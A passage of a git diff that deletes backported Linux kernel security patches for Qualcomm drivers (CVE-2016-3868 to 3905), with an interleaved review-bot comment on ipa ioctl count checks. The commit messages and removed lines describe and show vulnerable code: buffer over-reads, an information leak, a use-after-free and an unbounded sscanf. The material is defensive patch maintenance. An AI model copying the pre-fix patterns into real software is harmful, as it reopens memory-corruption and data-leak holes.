-EFAULT; - break; - } -- -- pyld_sz = sz + ((struct ipa_ioc_query_intf_ext_props *) -- header)->num_ext_props * -+ pre_entry = -+ ((struct ipa_ioc_query_intf_ext_props *) -+ header)->num_ext_props; -+ pyld_sz = sz + pre_entry * - sizeof(struct ipa_ioc_ext_intf_prop); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { -@@ -1159,6 +1298,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_query_intf_ext_props *) -+ param)->num_ext_props != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_query_intf_ext_props *) -+ param)->num_ext_props, pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_query_intf_ext_props( - (struct ipa_ioc_query_intf_ext_props *)param)) { - retval = -1; -@@ -1175,8 +1323,10 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -- pyld_sz = sizeof(struct ipa_msg_meta) + -+ pre_entry = - ((struct ipa_msg_meta *)header)->msg_len; -+ pyld_sz = sizeof(struct ipa_msg_meta) + -+ pre_entry; - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -1186,6 +1336,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_msg_meta *)param)->msg_len -+ != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_msg_meta *)param)->msg_len, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_pull_msg((struct ipa_msg_meta *)param, - (char *)param + sizeof(struct ipa_msg_meta), - ((struct ipa_msg_meta *)param)->msg_len) != -@@ -1302,10 +1461,12 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct 
ipa_ioc_add_hdr_proc_ctx *) -+ header)->num_proc_ctxs; - pyld_sz = - sizeof(struct ipa_ioc_add_hdr_proc_ctx) + -- ((struct ipa_ioc_add_hdr_proc_ctx *)header)->num_proc_ctxs * -- sizeof(struct ipa_hdr_proc_ctx_add); -+ pre_entry * sizeof(struct ipa_hdr_proc_ctx_add); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -1315,6 +1476,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_add_hdr_proc_ctx *) -+ param)->num_proc_ctxs != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_add_hdr_proc_ctx *) -+ param)->num_proc_ctxs, pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_add_hdr_proc_ctx( - (struct ipa_ioc_add_hdr_proc_ctx *)param)) { - retval = -EFAULT; -@@ -1331,10 +1501,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ pre_entry = -+ ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls; - pyld_sz = - sizeof(struct ipa_ioc_del_hdr_proc_ctx) + -- ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls * -- sizeof(struct ipa_hdr_proc_ctx_del); -+ pre_entry * sizeof(struct ipa_hdr_proc_ctx_del); - param = kzalloc(pyld_sz, GFP_KERNEL); - if (!param) { - retval = -ENOMEM; -@@ -1344,6 +1515,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) - retval = -EFAULT; - break; - } -+ /* add check in case user-space module compromised */ -+ if (unlikely(((struct ipa_ioc_del_hdr_proc_ctx *) -+ param)->num_hdls != pre_entry)) { -+ IPAERR(" prevent memory corruption(%d not match %d)\n", -+ ((struct ipa_ioc_del_hdr_proc_ctx *)param)-> -+ num_hdls, -+ pre_entry); -+ retval = -EINVAL; -+ break; -+ } - if (ipa3_del_hdr_proc_ctx( - (struct ipa_ioc_del_hdr_proc_ctx *)param)) { - retval = -EFAULT; --- -cgit v1.1 - 
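Review bot: The comment `/* add check in case user-space module compromised */`, repeated before every new `pre_entry` comparison in `ipa_ioctl` (ipa_v2) and `ipa3_ioctl` (ipa_v3), does not say what the check protects; I would replace it with `/* count re-read by the second copy must equal pre_entry, which sized param */`. The payload is allocated from the count in `header` and then filled again from user memory (going by the commit message; the copy itself is in context outside these hunks), so the comparison has to sit after that second copy and before any use of `param`, which is where every hunk puts it. The same block is open-coded at each site and differs only in struct and field name, so a small helper macro taking the struct type and field would keep the sites from drifting apart; the 0001.patch hunks just above already report the same mismatch with `-EFAULT` and a different message, while this patch uses `-EINVAL`. `pre_entry` is a plain `int` multiplied into `pyld_sz`, and the field types are not visible here, so confirm that none of the counts is wide enough for that product to wrap before `kzalloc`.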
diff --git a/Patches/Linux_CVEs/CVE-2016-3868/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3868/ANY/0001.patch
deleted file mode 100644
index 1a6f475f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3868/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@ -From 17014696ce3836c91215b6d6dd82f3befd6e7d4d Mon Sep 17 00:00:00 2001 -From: Archana Sathyakumar -Date: Wed, 29 Jun 2016 11:47:47 -0600 -Subject: msm-core: debug: Fix the number of arguments for sysfs nodes - -Ptable and enable node parses the input arguments incorrectly. Parse the -input message into exact number of arguments that are required for the -respective nodes. - -CRs-fixed: 1032875 -Change-Id: I881f18217b703a497efa4799288dee39a28ea8ab -Signed-off-by: Archana Sathyakumar ---- - drivers/power/qcom/debug_core.c | 14 +++++++++----- - 1 file changed, 9 insertions(+), 5 deletions(-) - -diff --git a/drivers/power/qcom/debug_core.c b/drivers/power/qcom/debug_core.c -index d3620bb..e9c578f 100644 ---- a/drivers/power/qcom/debug_core.c -+++ b/drivers/power/qcom/debug_core.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -22,6 +22,8 @@ - #include "soc/qcom/msm-core.h" - - #define MAX_PSTATES 50 -+#define NUM_OF_PENTRY 3 /* number of variables for ptable node */ -+#define NUM_OF_EENTRY 2 /* number of variables for enable node */ - - enum arg_offset { - CPU_OFFSET, -@@ -131,13 +133,15 @@ static void add_to_ptable(uint64_t *arg) - node->ptr->len = node->len; - } - --static int split_ptable_args(char *line, uint64_t *arg) -+static int split_ptable_args(char *line, uint64_t *arg, uint32_t n) - { - char *args; - int i; - int ret = 0; - -- for (i = 0; line; i++) { -+ for (i = 0; i < n; i++) { -+ if (!line) -+ break; - args = strsep(&line, " "); - ret = kstrtoull(args, 10, &arg[i]); - } -@@ -163,7 +167,7 @@ static ssize_t msm_core_ptable_write(struct file *file, - goto done; - } - kbuf[len] = '\0'; -- ret = split_ptable_args(kbuf, arg); -+ ret = split_ptable_args(kbuf, arg, NUM_OF_PENTRY); - 
if (!ret) { - add_to_ptable(arg); - ret = len; -@@ -227,7 +231,7 @@ static ssize_t msm_core_enable_write(struct file *file, - goto done; - } - kbuf[len] = '\0'; -- ret = split_ptable_args(kbuf, arg); -+ ret = split_ptable_args(kbuf, arg, NUM_OF_EENTRY); - if (ret) - goto done; - cpu = arg[CPU_OFFSET]; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0001.patch deleted file mode 100644 index dd8e504c..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0001.patch +++ /dev/null 
@@ -1,47 +0,0 @@ -From 50e8f265b3f7926aeb4e49c33f7301ace89faa77 Mon Sep 17 00:00:00 2001 -From: SaidiReddy Yenuga -Date: Mon, 30 May 2016 20:06:19 +0530 -Subject: qcacld-2.0: Fix buffer over read in iwpriv WE_UNIT_TEST_CMD command - -In current driver, WE_UNIT_TEST_CMD has below problems. -- apps_arg[1] can have negative value and can lead to - buffer overead. -- apps_arg[] can be dereferenced beyond the allocated length. - -Change the code to handle the number of args if user has -given negative value. Also avoid dereferencing the -apps_arg[] beyond the allocated length. - -CRs-Fixed: 997797 -Change-Id: Id26ebc32324b800ccdbecbd03f23861b5bde2aaf ---- - CORE/HDD/src/wlan_hdd_wext.c | 6 ++++-- - 1 file changed, 4 insertions(+), 2 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c -index d6cf499..e49ea8e 100644 ---- a/CORE/HDD/src/wlan_hdd_wext.c -+++ b/CORE/HDD/src/wlan_hdd_wext.c -@@ -9106,7 +9106,8 @@ static int __iw_set_var_ints_getnone(struct net_device *dev, - hddLog(LOGE, FL("Invalid MODULE ID %d"), apps_args[0]); - return -EINVAL; - } -- if (apps_args[1] > (WMA_MAX_NUM_ARGS)) { -+ if ((apps_args[1] > (WMA_MAX_NUM_ARGS)) || -+ (apps_args[1] < 0)) { - hddLog(LOGE, FL("Too Many args %d"), apps_args[1]); - return -EINVAL; - } -@@ -9119,7 +9120,8 @@ static int __iw_set_var_ints_getnone(struct net_device *dev, - unitTestArgs->vdev_id = (int)pAdapter->sessionId; - unitTestArgs->module_id = apps_args[0]; - unitTestArgs->num_args = apps_args[1]; -- for (i = 0, j = 2; i < unitTestArgs->num_args; i++, j++) { -+ for (i = 0, j = 2; i < unitTestArgs->num_args - 1; -+ i++, j++) { - unitTestArgs->args[i] = apps_args[j]; - } - msg.type = SIR_HAL_UNIT_TEST_CMD; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0002.patch deleted file mode 100644 index 2c2c44ef..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0002.patch +++ /dev/null 
@@ -1,44 +0,0 @@ -From a3974e61c960aadcc147c3c5704a67309171642d Mon Sep 17 00:00:00 2001 -From: SaidiReddy Yenuga -Date: Thu, 16 Jun 2016 13:20:35 +0530 -Subject: qcacld-2.0: Fix buffer over read in iwpriv WE_UNIT_TEST_CMD command - -In current driver, WE_UNIT_TEST_CMD has below problem. -- apps_arg[1] can have zero value and can lead to - buffer overead - -Change the code to handle the number of args if user has -given zero. - -CRs-Fixed: 1029540 -Change-Id: Idc8e1d77d9623daeb98d0c4b7ad8a8d6cfa9c2d2 ---- - CORE/HDD/src/wlan_hdd_wext.c | 5 ++--- - 1 file changed, 2 insertions(+), 3 deletions(-) - -diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c -index fd738da..33d4dfd 100644 ---- a/CORE/HDD/src/wlan_hdd_wext.c -+++ b/CORE/HDD/src/wlan_hdd_wext.c -@@ -9072,7 +9072,7 @@ static int __iw_set_var_ints_getnone(struct net_device *dev, - } - if ((apps_args[1] > (WMA_MAX_NUM_ARGS)) || - (apps_args[1] < 0)) { -- hddLog(LOGE, FL("Too Many args %d"), apps_args[1]); -+ hddLog(LOGE, FL("Too Many/Few args %d"), apps_args[1]); - return -EINVAL; - } - unitTestArgs = vos_mem_malloc(sizeof(*unitTestArgs)); -@@ -9084,8 +9084,7 @@ static int __iw_set_var_ints_getnone(struct net_device *dev, - unitTestArgs->vdev_id = (int)pAdapter->sessionId; - unitTestArgs->module_id = apps_args[0]; - unitTestArgs->num_args = apps_args[1]; -- for (i = 0, j = 2; i < unitTestArgs->num_args - 1; -- i++, j++) { -+ for (i = 0, j = 2; i < unitTestArgs->num_args; i++, j++) { - unitTestArgs->args[i] = apps_args[j]; - } - msg.type = SIR_HAL_UNIT_TEST_CMD; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3892/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3892/ANY/0001.patch deleted file mode 100644 index 349c36d0..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3892/ANY/0001.patch +++ /dev/null 
@@ -1,105 +0,0 @@ -From dd40cc2bd210dd7a4dd649e8f79add2bbeda2bd5 Mon Sep 17 00:00:00 2001 -From: Abhijeet Dharmapurikar -Date: Wed, 15 Jun 2016 09:46:21 -0700 -Subject: spmi: prevent showing the address of spmidev - -Creating devices with the address of the container spmidev is not -indicative of the actual hardware device it represents. - -Instead use an unique id to indicate the device it represents. - -CRs-Fixed: 1024197 -Change-Id: Id18e2a19f4fa1249901a3f275defa8f589270d69 -Signed-off-by: Abhijeet Dharmapurikar ---- - drivers/spmi/spmi.c | 18 +++++++++++++++--- - include/linux/spmi.h | 6 +++++- - 2 files changed, 20 insertions(+), 4 deletions(-) - -diff --git a/drivers/spmi/spmi.c b/drivers/spmi/spmi.c -index f5e49c8..1a1bae9 100644 ---- a/drivers/spmi/spmi.c -+++ b/drivers/spmi/spmi.c -@@ -32,6 +32,7 @@ struct spmii_boardinfo { - static DEFINE_MUTEX(board_lock); - static LIST_HEAD(board_list); - static DEFINE_IDR(ctrl_idr); -+static DEFINE_IDA(spmi_devid_ida); - static struct device_type spmi_dev_type; - static struct device_type spmi_ctrl_type; - -@@ -229,22 +230,32 @@ int spmi_add_device(struct spmi_device *spmidev) - { - int rc; - struct device *dev = get_valid_device(spmidev); -+ int id; - - if (!dev) { - pr_err("invalid SPMI device\n"); - return -EINVAL; - } - -+ id = ida_simple_get(&spmi_devid_ida, 0, 0, GFP_KERNEL); -+ if (id < 0) { -+ pr_err("No id available status = %d\n", id); -+ return id; -+ } -+ - /* Set the device name */ -- dev_set_name(dev, "%s-%p", spmidev->name, spmidev); -+ spmidev->id = id; -+ dev_set_name(dev, "%s-%d", spmidev->name, spmidev->id); - - /* Device may be bound to an active driver when this returns */ - rc = device_add(dev); - -- if (rc < 0) -+ if (rc < 0) { -+ ida_simple_remove(&spmi_devid_ida, spmidev->id); - dev_err(dev, "Can't add %s, status %d\n", dev_name(dev), rc); -- else -+ } else { - dev_dbg(dev, "device %s registered\n", dev_name(dev)); -+ } - - return rc; - } -@@ -292,6 +303,7 @@ EXPORT_SYMBOL_GPL(spmi_new_device); 
- void spmi_remove_device(struct spmi_device *spmi_dev) - { - device_unregister(&spmi_dev->dev); -+ ida_simple_remove(&spmi_devid_ida, spmi_dev->id); - } - EXPORT_SYMBOL_GPL(spmi_remove_device); - -diff --git a/include/linux/spmi.h b/include/linux/spmi.h -index b581de8..5a8525d 100644 ---- a/include/linux/spmi.h -+++ b/include/linux/spmi.h -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2014 The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -120,6 +120,9 @@ struct spmi_resource { - * @dev_node: array of SPMI resources when used with spmi-dev-container. - * @num_dev_node: number of device_node structures. - * @sid: Slave Identifier. -+ * @id: Unique identifier to differentiate from other spmi devices with -+ * possibly same name. -+ * - */ - struct spmi_device { - struct device dev; -@@ -129,6 +132,7 @@ struct spmi_device { - struct spmi_resource *dev_node; - u32 num_dev_node; - u8 sid; -+ int id; - }; - #define to_spmi_device(d) container_of(d, struct spmi_device, dev) - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3893/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3893/ANY/0001.patch deleted file mode 100644 index 6e74ecb2..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3893/ANY/0001.patch +++ /dev/null 
@@ -1,37 +0,0 @@
-From a7a6ddc91cce7ad5ad55c9709b24bfc80f5ac873 Mon Sep 17 00:00:00 2001
-From: Patrick Daly
-Date: Thu, 28 May 2015 18:32:49 -0700
-Subject: ASoC: wcd9xxx: Fix unprotected userspace access
-
-Protect against memory faults while accessing userspace addresses.
-
-Change-Id: I1433bac73d24d428749558e530e6869c2e5ee98f
-Signed-off-by: Patrick Daly
----
- sound/soc/codecs/wcdcal-hwdep.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/sound/soc/codecs/wcdcal-hwdep.c b/sound/soc/codecs/wcdcal-hwdep.c
-index 5013bee..954620a 100644
---- a/sound/soc/codecs/wcdcal-hwdep.c
-+++ b/sound/soc/codecs/wcdcal-hwdep.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -82,7 +82,8 @@ static int wcdcal_hwdep_ioctl_shared(struct snd_hwdep *hw,
- return -EFAULT;
- }
- data = fw[fw_user.cal_type]->data;
-- memcpy(data, fw_user.buffer, fw_user.size);
-+ if (copy_from_user(data, fw_user.buffer, fw_user.size))
-+ return -EFAULT;
- fw[fw_user.cal_type]->size = fw_user.size;
- mutex_lock(&fw_data->lock);
- set_bit(WCDCAL_RECIEVED, &fw_data->wcdcal_state[fw_user.cal_type]);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3894/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3894/ANY/0001.patch
deleted file mode 100644
index 3c220f50..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3894/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From de3e3e5930b1edfebec7870390443279ec5b65fe Mon Sep 17 00:00:00 2001
-From: Srinivasarao P
-Date: Fri, 22 Jul 2016 12:48:33 +0530
-Subject: msm : dma_test: Initialize newly allocated memory
-
-The MSM_DMA_IOALLOC ioctl command allocates kernel memory and
-this memory can be read back using the MSM_DMA_IORBUF ioctl command.
-This memory is not zero-initialized and may contain sensitive data.
-
-Change-Id: I8c55d6fe500e7607690b89806715893783eecf9c
-Signed-off-by: Srinivasarao P
----
- arch/arm/mach-msm/dma_test.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm/mach-msm/dma_test.c b/arch/arm/mach-msm/dma_test.c
-index 3d13e4e..1d717c3 100644
---- a/arch/arm/mach-msm/dma_test.c
-+++ b/arch/arm/mach-msm/dma_test.c
-@@ -99,7 +99,7 @@ static int buffer_req(struct msm_dma_alloc_req *req)
- if (i >= MAX_TEST_BUFFERS)
- goto error;
-
-- buffers[i] = kmalloc(req->size, GFP_KERNEL | __GFP_DMA);
-+ buffers[i] = kzalloc(req->size, GFP_KERNEL | __GFP_DMA);
- if (buffers[i] == 0)
- goto error;
- sizes[i] = req->size;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3901/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3901/ANY/0001.patch
deleted file mode 100644
index 4b807753..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3901/ANY/0001.patch
+++ /dev/null
@@ -1,59 +0,0 @@ -From 5f69ccf3b011c1d14a1b1b00dbaacf74307c9132 Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Fri, 29 Jul 2016 15:32:31 -0700 -Subject: msm: crypto: Fix integer over flow check in qcedev driver - -Integer overflow check always fails when ULONG_MAX is used, -as ULONG_MAX is 2^64-1, while req->data[i].len and total -are uint32_t. Make change to use U32_MAX instead of -ULONG_MAX. - -CRs-fixed: 1046507 -Change-Id: Iccf9c32400ecc7ffc0afae16f58c38e5d78a5b64 -Signed-off-by: Zhen Kong ---- - drivers/crypto/msm/qcedev.c | 8 ++++---- - 1 file changed, 4 insertions(+), 4 deletions(-) - -diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c -index 51f5069..e63f061 100644 ---- a/drivers/crypto/msm/qcedev.c -+++ b/drivers/crypto/msm/qcedev.c -@@ -1,6 +1,6 @@ - /* Qualcomm CE device driver. - * -- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved. -+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -1543,7 +1543,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req, - } - /* Check for sum of all dst length is equal to data_len */ - for (i = 0; i < req->entries; i++) { -- if (req->vbuf.dst[i].len >= ULONG_MAX - total) { -+ if (req->vbuf.dst[i].len >= U32_MAX - total) { - pr_err("%s: Integer overflow on total req dst vbuf length\n", - __func__); - goto error; -@@ -1557,7 +1557,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req, - } - /* Check for sum of all src length is equal to data_len */ - for (i = 0, total = 0; i < req->entries; i++) { -- if (req->vbuf.src[i].len > ULONG_MAX - total) { -+ if (req->vbuf.src[i].len > U32_MAX - total) { - pr_err("%s: Integer overflow on total req src vbuf length\n", - __func__); - goto error; -@@ -1619,7 +1619,7 @@ static int qcedev_check_sha_params(struct qcedev_sha_op_req 
*req, - - /* Check for sum of all src length is equal to data_len */ - for (i = 0, total = 0; i < req->entries; i++) { -- if (req->data[i].len > ULONG_MAX - total) { -+ if (req->data[i].len > U32_MAX - total) { - pr_err("%s: Integer overflow on total req buf length\n", - __func__); - goto sha_error; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3902/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3902/ANY/0001.patch deleted file mode 100644 index 66c6ddff..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3902/ANY/0001.patch +++ /dev/null 
@@ -1,44 +0,0 @@
-From 2fca425d781572393fbe51abe2e27a932d24a768 Mon Sep 17 00:00:00 2001
-From: Skylar Chang
-Date: Fri, 22 Jul 2016 15:03:16 -0700
-Subject: msm: ipa: handle information leak on ADD_FLT_RULE_INDEX ioctl
-
-IPA might have Information leak and device crash due to
-kernel heap overread in IPA driver when processing
-WAN_IOC_ADD_FLT_RULE_INDEX ioctl. The fix is to add
-check on max number of filter rules send to modem.
-
-Change-Id: I454e04d05cfcb7af8fc4bd2b4a1bade55c4684d0
-Signed-off-by: Skylar Chang
----
- drivers/platform/msm/ipa/ipa_qmi_service.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_qmi_service.c b/drivers/platform/msm/ipa/ipa_qmi_service.c
-index d68350a..58d7c181 100644
---- a/drivers/platform/msm/ipa/ipa_qmi_service.c
-+++ b/drivers/platform/msm/ipa/ipa_qmi_service.c
-@@ -491,7 +491,7 @@ int qmi_filter_request_send(struct ipa_install_fltr_rule_req_msg_v01 *req)
- if (req->filter_spec_list_len == 0) {
- IPAWANDBG("IPACM pass zero rules to Q6\n");
- } else {
-- IPAWANDBG("IPACM pass %d rules to Q6\n",
-+ IPAWANDBG("IPACM pass %u rules to Q6\n",
- req->filter_spec_list_len);
- }
-
-@@ -622,6 +622,11 @@ int qmi_filter_notify_send(struct ipa_fltr_installed_notif_req_msg_v01 *req)
- IPAWANERR(" delete UL filter rule for pipe %d\n",
- req->source_pipe_index);
- return -EINVAL;
-+ } else if (req->filter_index_list_len > QMI_IPA_MAX_FILTERS_V01) {
-+ IPAWANERR(" UL filter rule for pipe %d exceed max (%u)\n",
-+ req->source_pipe_index,
-+ req->filter_index_list_len);
-+ return -EINVAL;
- } else if (req->filter_index_list[0].filter_index == 0 &&
- req->source_pipe_index !=
- ipa_get_ep_mapping(IPA_CLIENT_APPS_LAN_WAN_PROD)) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3903/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3903/ANY/0001.patch
deleted file mode 100644
index 2b2badff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3903/ANY/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@ -From b8874573428e8ce024f57c6242d662fcca5e5d55 Mon Sep 17 00:00:00 2001 -From: VijayaKumar T M -Date: Mon, 25 Jul 2016 11:53:19 +0530 -Subject: msm: camera: sensor: Fix use after free condition - -Add a check to return value before calling csid config which will -otherwise lead to use after free scenario. - -CRs-Fixed: 1040857 -Change-Id: I4f4d9e38eeb537875e0d01de0e99913a44dd3f3f -Signed-off-by: VijayaKumar T M ---- - drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c | 10 +++++++--- - 1 file changed, 7 insertions(+), 3 deletions(-) - -diff --git a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c -index 5864096..7dd2959 100644 ---- a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c -+++ b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -518,7 +518,7 @@ static int32_t msm_csid_cmd(struct csid_device *csid_dev, void __user *arg) - break; - } - if (csid_params.lut_params.num_cid < 1 || -- csid_params.lut_params.num_cid > 16) { -+ csid_params.lut_params.num_cid > MAX_CID) { - pr_err("%s: %d num_cid outside range\n", - __func__, __LINE__); - rc = -EINVAL; -@@ -547,6 +547,10 @@ static int32_t msm_csid_cmd(struct csid_device *csid_dev, void __user *arg) - csid_params.lut_params.vc_cfg[i] = vc_cfg; - } - csid_dev->csid_sof_debug = 0; -+ if (rc < 0) { -+ pr_err("%s:%d failed\n", __func__, __LINE__); -+ break; -+ } - rc = msm_csid_config(csid_dev, &csid_params); - for (i--; i >= 0; i--) - kfree(csid_params.lut_params.vc_cfg[i]); -@@ -658,7 +662,7 @@ static int32_t msm_csid_cmd32(struct csid_device *csid_dev, void __user *arg) - csid_params.lut_params.num_cid = lut_par32.num_cid; - - if (csid_params.lut_params.num_cid < 1 || -- csid_params.lut_params.num_cid > 16) { -+ csid_params.lut_params.num_cid > MAX_CID) { - pr_err("%s: %d num_cid outside range\n", - __func__, __LINE__); - rc = -EINVAL; --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-3904/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3904/ANY/0001.patch deleted file mode 100644 index 78d2a26b..00000000 --- a/Patches/Linux_CVEs/CVE-2016-3904/ANY/0001.patch +++ /dev/null 
@@ -1,39 +0,0 @@
-From 069683407ca9a820d05c914b57c587bcd3f16a3a Mon Sep 17 00:00:00 2001
-From: David Dai
-Date: Fri, 5 Aug 2016 15:14:25 -0700
-Subject: msm: msm_bus: limit max chars read by sscanf
-
-Current bus_floor_vote_store_api does not limit/check
-the size of the string in input, allowing stack overflow.
-Specify the max number of characters read allowable to
-the size of destination buffer.
-
-CRs-Fixed: 1050455
-Change-Id: Ia9227480be6ea4f3ade71f5675f95a3efd9fcf99
-Signed-off-by: David Dai
----
- drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c b/drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c
-index e4c8f1f..a876484 100644
---- a/drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c
-+++ b/drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
- *
- * This program is Mree software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -133,7 +133,7 @@ static ssize_t bus_floor_vote_store_api(struct device *dev,
- return 0;
- }
-
-- if (sscanf(buf, "%s %llu", name, &vote_khz) != 2) {
-+ if (sscanf(buf, "%9s %llu", name, &vote_khz) != 2) {
- pr_err("%s:return error", __func__);
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3905/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-3905/qcacld-2.0/0001.patch
deleted file mode 100644
index adb60fd8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3905/qcacld-2.0/0001.patch
+++ /dev/null
